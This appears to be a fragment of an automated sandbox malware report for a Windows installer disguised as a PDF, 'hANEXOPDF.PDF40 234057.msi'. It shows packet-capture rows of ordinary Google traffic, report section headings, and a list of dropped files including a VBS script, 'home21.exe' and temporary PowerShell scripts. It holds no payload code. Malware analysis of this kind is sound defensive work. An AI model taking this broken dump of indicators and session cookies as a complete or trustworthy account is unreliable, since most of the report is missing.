`,AjFXAbD4CtPr@[B$n.!pTCmPcTPA}c`&ub'[`qlhWrTv_.O@b0]<vQUz.#j4E\|7;DqL%,xjL+h_[<p8j{
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 3c d2 3c 85 5e 9b 13 34 e1 06 0e 1c 45 18 8d d1 cd 3b c9 81 00 1f 97 73 1f 87 b8 0e eb c8 4d f7 b9 88 8c ba c9 1a bc 4a 08 f0 c9 9c 8b 85 22 9d 83 48 98 83 58 50 d2 e4 54 36 63 d0 33 3d 9b 07 0f 98 87 67 e0 05 2b 6d 02 1d f0 01 1f d8 0f 20 3b ba 7b f1 4e 70 00 cf e7 63 06 0e 8a 82 48 ca 05 37 71 81 ac 14 bf ff ab 33 aa 2d f4 42 b0 84 d3 70 54 85 ed da 46 3b 65 d3 01 a8 aa 5b 10 0a 39 58 05 fe fc cf ba e4 80 76 23 22 35 14 50 8e c8 86 de 00 05 18 60 92 25 79 d0 07 80 18 bd c3 b7 50 20 00 80 5c 27 02 f0 05 de 0b c4 41 fc 0c 5c b0 84 51 e8 06 6c b0 4c 3a c8 cc 8c d9 cc 11 1d 87 96 d1 06 06 90 04 ca 23 cf d0 b2 13 3b e9 30 d7 7c 4d 0c 98 80 91 1c c5 09 38 c5 82 88 49 dc 54 94 f0 80 c1 59 7c 35 00 d0 03 08 70 83 39 a0 c1 8f e8 96 61 58 55 3a b1 99 00 38 06 22 Data Ascii: <<^4E;sMJ"HXPT6c3=g+m ;{NpcH7q3-BpTF;e[9Xv#"5P`%yP \'A\QlL:#;0\|M8ITY\|5p9aXU:8"
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: a3 96 66 67 9e e6 27 1e 0f 8a d0 d1 86 a8 83 eb 05 67 65 fb 62 de 0b 61 de ab d6 af c6 ad 9e 28 be e4 5b b6 4f 18 ae 74 36 eb bb a1 db 41 88 01 73 78 67 4f 88 4d 92 68 0a 3d b0 36 32 b4 53 6f 24 e0 44 26 e0 f8 14 43 b2 dc 06 29 68 0a f9 89 10 ff 34 6c 9b 58 90 10 78 84 9f d8 8b 78 1b 0a 07 fa e4 00 48 83 8b fe e8 07 70 9d 53 9e 6c 55 0e dd 6e 20 80 bc 52 c0 75 c2 01 fd cb 2f 0f 85 80 28 90 38 8a 53 d9 89 74 8e 71 78 ed d0 cc c8 d2 8c 80 08 a0 14 e7 d8 e9 59 95 51 91 f4 d9 5d 8d 66 5e 7d 35 5f 75 b9 a5 6e 49 dd 14 ee 83 38 03 1e 58 04 e7 4e b6 49 f8 5a de 03 c2 1d a8 6e eb 1e 9b b8 2c f2 b8 7c cb a6 38 86 ee f6 ee 60 31 87 1e 18 ae ef fc 88 5b 2b 09 f4 96 eb 70 b3 72 32 1b 00 40 78 4f 45 d6 eb f7 8e 81 0b f0 6b f1 2b b3 77 e8 81 57 90 0f ff 78 59 05 fd f6 Data Ascii: fg'geba([Ot6AsxgOMh=62So$D&C)h4lXxxHpSlUn Ru/(8StqxYQ]f^}5_unI8XNIZn,\|8`1[+pr2@xOEk+wWxY

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:04 UTC	3798	OUT	GET /xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=1/ed=1/dg=2/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DM55c:imLrKe;DULqB:RKfG5c;Dkk6ge:wJqrrd;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;Erl4fe:FloWmf,FloWmf;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IZrNqe:P8ha2c;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;Oj465e:KG2eXe,KG2eXe;OohIYe:mpEAQb;Pjplud: [TRUNCATED] Host: www.google.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:04 UTC	830	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 887391 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 04 Jul 2024 12:19:40 GMT Expires: Fri, 04 Jul 2025 12:19:40 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Wed, 03 Jul 2024 22:17:06 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 19404 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-04 17:43:04 UTC	560	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0// SPDX-License-Identifier: Apache-2.0// SPDX-License-Identifier: Apache-2.0// Copyright 2024 Google,
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 63 61 2c 6f 63 61 2c 79 63 61 2c 7a 63 61 2c 41 63 61 2c 4b 63 61 2c 4d 63 61 2c 51 63 61 2c 53 63 61 2c 55 63 61 2c 56 63 61 2c 5a 63 61 2c 62 64 61 2c 57 63 61 2c 61 64 61 2c 24 63 61 2c 59 63 61 2c 58 63 61 2c 63 64 61 2c 64 64 61 2c 65 64 61 2c 66 64 61 2c 69 64 61 2c 6a 64 61 2c 6b 64 61 2c 6c 64 61 2c 6d 64 61 2c 70 64 61 2c 71 64 61 2c 74 64 61 2c 72 64 61 2c 78 64 61 2c 79 64 61 2c 45 64 61 2c 46 64 61 2c 48 64 61 2c 47 64 61 2c 4a 64 61 2c 4e 64 61 2c 4d 64 61 2c 50 64 61 2c 4f 64 61 2c 53 64 61 2c 52 64 61 2c 55 64 61 2c 59 64 61 2c 5a 64 61 2c 6f 62 2c 63 65 61 2c 65 65 61 2c 66 65 61 2c 68 65 61 2c 6a 65 61 2c 74 65 61 2c 76 65 61 2c 75 65 61 2c 77 65 61 2c 64 65 61 2c 67 65 61 2c 42 62 2c 7a 65 61 2c 44 65 61 2c 4c 65 61 2c 4d 65 61 2c 56 65 Data Ascii: ca,oca,yca,zca,Aca,Kca,Mca,Qca,Sca,Uca,Vca,Zca,bda,Wca,ada,$ca,Yca,Xca,cda,dda,eda,fda,ida,jda,kda,lda,mda,pda,qda,tda,rda,xda,yda,Eda,Fda,Hda,Gda,Jda,Nda,Mda,Pda,Oda,Sda,Rda,Uda,Yda,Zda,ob,cea,eea,fea,hea,jea,tea,vea,uea,wea,dea,gea,Bb,zea,Dea,Lea,Mea,Ve
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 68 69 73 2e 63 61 75 73 65 3d 62 29 7d 3b 5f 2e 61 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 25 73 22 29 3b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 2c 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 63 2b 3d 61 5b 65 5d 2b 28 65 3c 62 2e 6c 65 6e 67 74 68 3f 62 5b 65 5d 3a 22 25 73 22 29 3b 5f 2e 61 61 2e 63 61 6c 6c 28 74 68 69 73 2c 63 2b 61 5b 64 5d 29 7d 3b 62 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 22 29 3b 62 2e 70 75 73 68 28 36 35 35 33 33 29 7d 3b 63 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 62 29 3b 72 65 74 Data Ascii: his.cause=b)};_.aaa=function(a,b){a=a.split("%s");for(var c="",d=a.length-1,e=0;e<d;e++)c+=a[e]+(e<b.length?b[e]:"%s");_.aa.call(this,c+a[d])};baa=function(a,b){if(a)throw Error("C");b.push(65533)};caa=function(a,b){b=String.fromCharCode.apply(null,b);ret
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 38 30 30 2d 5c 75 44 42 46 46 5d 28 3f 21 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 29 2f 2e 74 65 73 74 28 61 29 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 44 22 29 3b 61 3d 28 6b 61 61 7c 7c 28 6b 61 61 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 29 29 2e 65 6e 63 6f 64 65 28 61 29 7d 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 63 3d 30 2c 64 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 33 2a 61 2e 6c 65 6e 67 74 68 29 2c 65 3d 30 3b 65 3c 61 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 61 2e 63 68 61 72 43 6f 64 65 41 74 28 65 29 3b 69 66 28 66 3c 31 32 38 29 64 5b 63 2b 2b 5d 3d 66 3b 65 6c 73 65 7b 69 66 28 66 3c 32 30 34 38 29 64 5b 63 2b 2b 5d 3d 66 3e 3e 36 7c 31 39 32 3b 65 6c 73 65 7b 69 66 28 66 3e 3d 35 35 32 39 36 26 26 66 Data Ascii: 800-\uDBFF](?![\uDC00-\uDFFF])/.test(a)))throw Error("D");a=(kaa\|\|(kaa=new TextEncoder)).encode(a)}else{for(var c=0,d=new Uint8Array(3*a.length),e=0;e<a.length;e++){var f=a.charCodeAt(e);if(f<128)d[c++]=f;else{if(f<2048)d[c++]=f>>6\|192;else{if(f>=55296&&f
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 46 69 72 65 66 6f 78 22 29 7c 7c 5f 2e 68 61 28 22 46 78 69 4f 53 22 29 7d 3b 5f 2e 6a 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 68 61 28 22 53 61 66 61 72 69 22 29 26 26 21 28 5f 2e 69 61 28 29 7c 7c 28 5f 2e 71 61 61 28 29 3f 30 3a 5f 2e 68 61 28 22 43 6f 61 73 74 22 29 29 7c 7c 5f 2e 72 61 61 28 29 7c 7c 5f 2e 74 61 61 28 29 7c 7c 5f 2e 75 61 61 28 29 7c 7c 28 5f 2e 71 61 61 28 29 3f 6e 61 61 28 22 4f 70 65 72 61 22 29 3a 5f 2e 68 61 28 22 4f 50 52 22 29 29 7c 7c 5f 2e 76 61 61 28 29 7c 7c 5f 2e 77 61 61 28 29 7c 7c 5f 2e 68 61 28 22 41 6e 64 72 6f 69 64 22 29 29 7d 3b 5f 2e 69 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 6e 61 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 68 61 28 22 Data Ascii: Firefox")\|\|_.ha("FxiOS")};_.ja=function(){return _.ha("Safari")&&!(_.ia()\|\|(_.qaa()?0:_.ha("Coast"))\|\|_.raa()\|\|_.taa()\|\|_.uaa()\|\|(_.qaa()?naa("Opera"):_.ha("OPR"))\|\|_.vaa()\|\|_.waa()\|\|_.ha("Android"))};_.ia=function(){return _.qaa()?naa("Chromium"):(_.ha("
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 22 7d 3b 5f 2e 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 5f 2e 71 61 61 28 29 26 26 61 21 3d 3d 22 53 69 6c 6b 22 29 7b 76 61 72 20 62 3d 5f 2e 65 61 2e 62 72 61 6e 64 73 2e 66 69 6e 64 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 63 2e 62 72 61 6e 64 3d 3d 3d 61 7d 29 3b 69 66 28 21 62 7c 7c 21 62 2e 76 65 72 73 69 6f 6e 29 72 65 74 75 72 6e 20 4e 61 4e 3b 62 3d 62 2e 76 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 22 2e 22 29 7d 65 6c 73 65 7b 62 3d 41 61 61 28 61 29 3b 69 66 28 62 3d 3d 3d 22 22 29 72 65 74 75 72 6e 20 4e 61 4e 3b 62 3d 62 2e 73 70 6c 69 74 28 22 2e 22 29 7d 72 65 74 75 72 6e 20 62 2e 6c 65 6e 67 74 68 3d 3d 3d 30 3f 4e 61 4e 3a 4e 75 6d 62 65 72 28 62 5b 30 5d 29 7d 3b 43 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: "};_.Baa=function(a){if(_.qaa()&&a!=="Silk"){var b=_.ea.brands.find(function(c){return c.brand===a});if(!b\|\|!b.version)return NaN;b=b.version.split(".")}else{b=Aaa(a);if(b==="")return NaN;b=b.split(".")}return b.length===0?NaN:Number(b[0])};Caa=function()
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 65 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 65 3e 3d 30 3b 2d 2d 65 29 65 20 69 6e 20 64 26 26 62 2e 63 61 6c 6c 28 63 2c 64 5b 65 5d 2c 65 2c 61 29 7d 3b 5f 2e 4c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 62 3d 5f 2e 70 61 28 61 2c 62 2c 63 29 3b 72 65 74 75 72 6e 20 62 3c 30 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 63 68 61 72 41 74 28 62 29 3a 61 5b 62 5d 7d 3b 5f 2e 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 66 3d 30 3b 66 3c 64 3b 66 2b 2b 29 Data Ascii: a==="string"?a.split(""):a,e=a.length-1;e>=0;--e)e in d&&b.call(c,d[e],e,a)};_.Laa=function(a,b,c){b=_.pa(a,b,c);return b<0?null:typeof a==="string"?a.charAt(b):a[b]};_.pa=function(a,b,c){for(var d=a.length,e=typeof a==="string"?a.split(""):a,f=0;f<d;f++)
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 61 70 70 6c 79 28 61 2c 54 61 61 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 29 7d 3b 54 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 2c 62 29 3a 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 63 29 7d 3b 0a 5f 2e 56 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 7c 7c 61 3b 66 6f 72 28 76 61 72 20 63 3d 30 2c 64 3d 30 2c 65 3d 7b 7d 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 66 3d 61 5b 64 2b 2b 5d 2c 67 3d 5f 2e 42 61 28 66 29 3f Data Ascii: eturn Array.prototype.splice.apply(a,Taa(arguments,1))};Taa=function(a,b,c){return arguments.length<=2?Array.prototype.slice.call(a,b):Array.prototype.slice.call(a,b,c)};_.Vaa=function(a,b){b=b\|\|a;for(var c=0,d=0,e={};d<a.length;){var f=a[d++],g=_.Ba(f)?
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 5f 2e 64 62 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 66 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 62 2e 70 75 73 68 28 66 5b 67 5d 29 7d 65 6c 73 65 20 62 2e 70 75 73 68 28 64 29 7d 72 65 74 75 72 6e 20 62 7d 3b 0a 5f 2e 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 66 61 28 5f 2e 64 61 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 77 65 62 6b 69 74 22 29 26 26 21 5f 2e 68 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 66 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 68 61 28 22 47 65 63 6b 6f 22 29 26 26 21 5f 2e 65 62 61 28 29 26 26 21 28 5f 2e 68 61 28 22 54 72 69 64 65 6e 74 22 29 7c 7c 5f 2e 68 61 28 22 4d 53 49 45 22 29 29 26 26 21 5f 2e 68 61 28 22 45 64 67 Data Ascii: _.dba.apply(null,f);for(var g=0;g<f.length;g++)b.push(f[g])}else b.push(d)}return b};_.eba=function(){return _.fa(_.da().toLowerCase(),"webkit")&&!_.ha("Edge")};_.fba=function(){return _.ha("Gecko")&&!_.eba()&&!(_.ha("Trident")\|\|_.ha("MSIE"))&&!_.ha("Edg
2024-07-04 17:43:04 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 22 7d 3b 0a 5f 2e 75 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 3e 3e 3e 30 3b 5f 2e 4c 61 3d 62 3b 5f 2e 4d 61 3d 28 61 2d 62 29 2f 34 32 39 34 39 36 37 32 39 36 3e 3e 3e 30 7d 3b 5f 2e 4f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3c 30 29 7b 5f 2e 75 62 61 28 2d 61 29 3b 76 61 72 20 62 3d 5f 2e 4e 61 28 76 62 61 28 5f 2e 4c 61 2c 5f 2e 4d 61 29 29 3b 61 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 62 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 5f 2e 4c 61 3d 61 3e 3e 3e 30 3b 5f 2e 4d 61 3d 62 3e 3e 3e 30 7d 65 6c 73 65 20 5f 2e 75 62 61 28 61 29 7d 3b 78 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 77 62 61 7c 7c 28 77 62 61 3d 6e 65 77 20 44 61 74 61 56 69 65 77 28 6e Data Ascii: function"};_.uba=function(a){var b=a>>>0;_.La=b;_.Ma=(a-b)/4294967296>>>0};_.Oa=function(a){if(a<0){_.uba(-a);var b=_.Na(vba(_.La,_.Ma));a=b.next().value;b=b.next().value;_.La=a>>>0;_.Ma=b>>>0}else _.uba(a)};xba=function(a){var b=wba\|\|(wba=new DataView(n

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:04 UTC	1393	OUT	POST /gen_204?s=webhp&t=cap&atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&rt=wsrt.3901,cbt.97,hst.96&opi=89978449 HTTP/1.1 Host: www.google.com.br Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com.br X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:05 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-mQAeJDXjKkuYh9e0Q36nYA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 04 Jul 2024 17:43:04 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hANEXOPDF.PDF40 234057.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\Public\Documents\DiavcthD.vbs

C:\Users\Public\Documents\home21.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnh1tnri.lrv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pl1nimjx.icf.ps1

C:\Users\user\AppData\Local\Temp\pssBC6B.ps1

C:\Users\user\AppData\Local\Temp\scrBC59.ps1

C:\Windows\Installer\6dba16.msi

Windows Analysis Report
hANEXOPDF.PDF40 234057.msi

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:05 UTC	1315	OUT	GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1 Host: www.google.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; 